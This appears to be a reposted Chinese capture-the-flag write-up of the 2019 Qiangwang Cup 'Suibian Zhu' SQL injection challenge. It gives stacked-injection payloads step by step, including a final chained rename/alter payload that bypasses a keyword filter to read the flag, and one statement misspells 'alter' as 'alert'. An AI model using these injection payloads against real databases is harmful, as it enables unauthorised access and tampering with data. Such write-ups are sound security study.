首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-07-03 00:42:09
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
世界上到底有沒有奧特曼存在
世界上到底有沒有奧特曼存在
隻要一提起奧特曼,很多人都會想起光之國,其實宇宙之中誕生過奧特曼的星球還真不少,到目前為止至少有七個了。那如果這些星球上的奧特曼互毆起來的話,大家覺得到底誰的實力會更強一些?在昭和系的時候,圓谷雖然重點講述光之國奧特曼的故事,但是也有其他星...
2026-07-03
雲南阿老表的
雲南阿老表的
猜你喜歡這裡是世界恐龍之鄉這裡是東方人類故鄉這裡是中國彜族文化大觀園這裡是楚雄!4月15日雲南楚雄彜族自治州将迎來成立60周年紀念日從4月14日至16日楚雄州将開展一系列豐富多彩的州慶活動楚雄彜族自治州成立于1958年是全國30個民族自治州...
2026-07-03
一針式新冠疫苗在哪打
一針式新冠疫苗在哪打
一針式新冠疫苗在哪打?新冠病毒疫苗的接種都是在當地衛生健康行政部門批準的接種單位進行通常情況下,接種單位設在轄區的衛生服務中心、鄉鎮衛生院或者綜合醫院轄區衛生健康行政部門或者疾病預防控制機構也會按要求公布可以進行新冠病毒疫苗接種的接種單位,...
2026-07-03
劍網三的技能分類
劍網三的技能分類
劍網三的技能分類?【純陽】氣純(紫霞功):,下面我們就來說一說關于劍網三的技能分類?我們一起去了解并探讨一下這個問題吧!劍網三的技能分類【純陽】氣純(紫霞功):奇穴[白虹][霜鋒][破蒼穹][無形][抱元守缺(不缺藍可點雨集)][太極][萬...
2026-07-03
北京有一家很牛的寺廟
北京有一家很牛的寺廟
北京千年古寺潭柘寺,古樹參天環境清幽,很多人不認識“柘”字帝都北京是人們最喜歡遊玩的城市之一,集古老的曆史人文景觀、優美的山水自然景觀,以及科技感爆棚的現代化建築等于一身,備受遊客青睐。北京人氣最高的景點主要有長城、故宮、古北水鎮等。其中有...
2026-07-03
Copyright 2023-2026 - www.tftnews.com All Rights Reserved